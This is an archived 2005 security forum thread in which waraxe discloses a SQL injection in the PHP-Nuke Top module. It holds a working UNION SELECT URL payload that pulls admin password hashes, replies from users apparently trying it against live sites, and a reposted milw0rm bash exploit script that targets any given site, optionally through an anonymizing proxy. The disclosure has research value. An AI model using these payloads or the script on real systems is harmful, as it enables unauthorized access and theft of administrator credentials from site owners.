Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: July 27, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 231 Members: 0 Total: 231 Full disclosure CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus [KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability CVE-2024-33326 CVE-2024-33327 CVE-2024-33328 CVE-2024-33329 CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100 SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products Novel DoS Vulnerability Affecting WebRTC Media Servers APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8 40 vulnerabilities in Toshiba Multi-Function Printers 17 vulnerabilities in Sharp Multi-Function Printers SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise) IT Security and Insecurity Portal www.waraxe.us Forum Index -> General discussion -> SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module Goto page 1, 2Next View previous topic :: View next topic SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module Posted: Wed Apr 06, 2005 6:43 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu {================================================================================} { [waraxe-2005-SA#041] } {================================================================================} { } { [ Critical Sql Injection in PhpNuke 6.x-7.6 Top module ] } { } {================================================================================} Author: Janek Vind "waraxe" Date: 06. April 2005 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-41.html Target software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Php-Nuke is a popular opensource content management system, written in php by Francisco Burzi. This CMS is used on many thousands websites, because it's freeware, easy to install and manage and has broad set of features. Homepage: http://phpnuke.org Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Like title says, this time the sql injection security hole have been found in phpnuke "Top" module. Lets look @ source code of the phpnuke 7.6 top module index file (/modules/Top/index.php) ~ line 186: [original source code] /* Top 10 Polls */ $result8 = $db->sql_query("select * from ".$prefix."_poll_desc $queryplang"); if ($db->sql_numrows($result8)>0) { echo "<table border=\"0\" cellpadding=\"10\" width=\"100%\"><tr><td align=\"left\">\n" ."<font class=\"option\"><b>$top "._VOTEDPOLLS."</b></font><br><br><font class=\"content\">\n"; $lugar = 1; $result9 = sql_query("SELECT pollID, pollTitle, timeStamp, voters FROM ".$prefix."_poll_desc $querylang order by voters DESC limit 0,$top", $dbi); $counter = 0; [/original source code] And what's the problem? It appears, that variable "$querylang" is uninitialized. So, if we will "poison" php variable space through GET/POST/COOKIE, then sql query manipulation is possible. [real life exploit] http://localhost/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION %20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/* [/real life exploit] ... and as result we can see md5 hashes of all the admin passwords in place, where normally top 10 votes can be seen Of course, mysql version 4.x must be used with enabled union functionality. And if there are Sentinel or similar protection systems installed, additional measures must be used to evade them. Have a nice day! How to fix: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ For help look @ http://www.waraxe.us/forums.html Additional resources: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Free Base64 decoder and encoder - http://base64-encoder-online.waraxe.us/ SiteMapper - free php script for phpNuke powered websites - newest version 0.4 can be downloaded @ http://sitemapper.waraxe.us/ Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to LINUX, murdock, g0df4th3r, slimjim100, shai-tan, y3dips and all other active members from my forum ! Special greets to Heintz - congrats about phpbb sploit finding ! Tervitused - Raido Kerna ! Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Homepage: http://www.waraxe.us/ ---------------------------------- [ EOF ] ------------------------------------ Last edited by waraxe on Thu Jun 22, 2006 1:11 pm; edited 1 time in total Posted: Wed Apr 06, 2005 7:10 pm murdock Advanced user Joined: Mar 16, 2005 Posts: 54 Wooow Waraxe!!!!!! Nice one! I try it now immediatly! Salut! Posted: Wed Apr 06, 2005 9:57 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu By the way, i found this sql injection bug many time ago, somewhere november 2004, and had not published it yet. More than 3 month was passed but nobody has found that little security bug Even worst, this bug exists even in very old nuke versions, maybe 5.x too, have not tested... Posted: Wed Apr 06, 2005 10:12 pm murdock Advanced user Joined: Mar 16, 2005 Posts: 54 Jejeje, as we say in spain: "Lo bueno se hace esperar" (In english means: "Good things make you wait", or something like this ) Posted: Thu Apr 07, 2005 7:31 am y3dips Valuable expert Joined: Feb 25, 2005 Posts: 281 Location: Indonesia there you go waraxe, step ahead to back on track maybe u could input it on your SQLaxe library _________________ IO::y3dips->new(http://clog.ammar.web.id); Posted: Thu Apr 07, 2005 10:22 pm LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman good work waraxe Posted: Thu Apr 07, 2005 10:33 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Thanks, mate By the way - new advisory will come out somewhere next week and it will be not about phpnuke, but some other widely-used software So, stay tuned and check bugtraq and my forum Posted: Fri Apr 08, 2005 9:43 am SteX Advanced user Joined: May 18, 2004 Posts: 181 Location: Serbia keep working.. _________________ We would change the world, but God won't give us the sourcecode... ....Watch the master. Follow the master. Be the master.... ------------------------------------------------------- Posted: Fri Apr 08, 2005 12:12 pm shai-tan Valuable expert Joined: Feb 22, 2005 Posts: 477 Thanks for mentioning my name lol. A lot of sites have already had this problem fixed well before it went public. Dial up is good for somethings. Specialy when my IP changes everytime I logon. Lets me not get effected by sentinal. lol Thanks for the name mention. That makes me proud. BTW I just got all my hair shaved off. So I look like a skin head. _________________ Shai-tan ?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds Posted: Fri Apr 08, 2005 12:28 pm murdock Advanced user Joined: Mar 16, 2005 Posts: 54 Wow! My name is also mentioned! :_ ) Thanks waraxe! Posted: Fri Apr 08, 2005 12:34 pm shai-tan Valuable expert Joined: Feb 22, 2005 Posts: 477 Dam you You got your name mention first _________________ Shai-tan ?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds Posted: Fri Apr 08, 2005 2:15 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu shai-tan wrote: Thanks for mentioning my name lol. A lot of sites have already had this problem fixed well before it went public. Dial up is good for somethings. Specialy when my IP changes everytime I logon. Lets me not get effected by sentinal. lol Thanks for the name mention. That makes me proud. BTW I just got all my hair shaved off. So I look like a skin head. There are many restricting factors to be that exploit successful: 1. UNION functionality means that mysql engine must be > 4.x 2. there must be Top module activated 3. if there is not enough voted polls, sploit will not work etc ... But real-life tests will show, that there is a lots of phpnuke driven websites waiting for pach Posted: Fri Apr 08, 2005 2:46 pm murdock Advanced user Joined: Mar 16, 2005 Posts: 54 Here are the typical erros I get using this exploit: Sometimes returns: Code: 10 primeras encuestas m?s votadas Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414 10 autores m?s activos Sometimes simply appears nothing: Code: 10 primeras encuestas m?s votadas 10 autores m?s activos And sometimes simply...works! http://img8.exs.cx/my.php?loc=img8&image=sqlinjecttop2pl.jpg Posted: Fri Apr 08, 2005 2:51 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Yes, that's it: Case 1 - mysql 3.x without UNION functionality: Code: 10 primeras encuestas m?s votadas Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414 10 autores m?s activos case 2 - not enough votes or votes disabled: Code: 10 primeras encuestas m?s votadas 10 autores m?s activos And if you are lucky enough: Quote: http://img8.exs.cx/my.php?loc=img8&image=sqlinjecttop2pl.jpg Posted: Fri Apr 08, 2005 8:08 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Look here for sploit derivation: http://www.milw0rm.com/id.php?id=921 Code: #/bin/bash # This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1 # works thou /str0ke # # PHPNuke Top Module Remote SQL Injection # by Fabrizi Andrea 2005 # andrea.fabrizi [at] gmail.com # # Work with the PHPNuke latest version! # URL=$1; PATH="$2/"; ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/"; echo -e "\n PHPNuke Top Module Remote SQL Injection" echo -e " by Fabrizi Andrea 2005" if [ "$URL" = "" ]; then echo -e "\n USAGE: $0 [URL] [NukePath]" echo -e " Example: $0 www.site.net phpNuke\n" exit fi; if [ $PATH = "/" ]; then PATH=""; fi; #anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke #query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke echo -e "\n - Anonymous Query URL: "$anon_query_url "\n"; echo -e " - Direct Query URL: " $query_url "\n"; echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n" # milw0rm.com [2005-04-07] Nice one SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module www.waraxe.us Forum Index -> General discussion You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 2 Goto page 1, 2Next All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.208 Seconds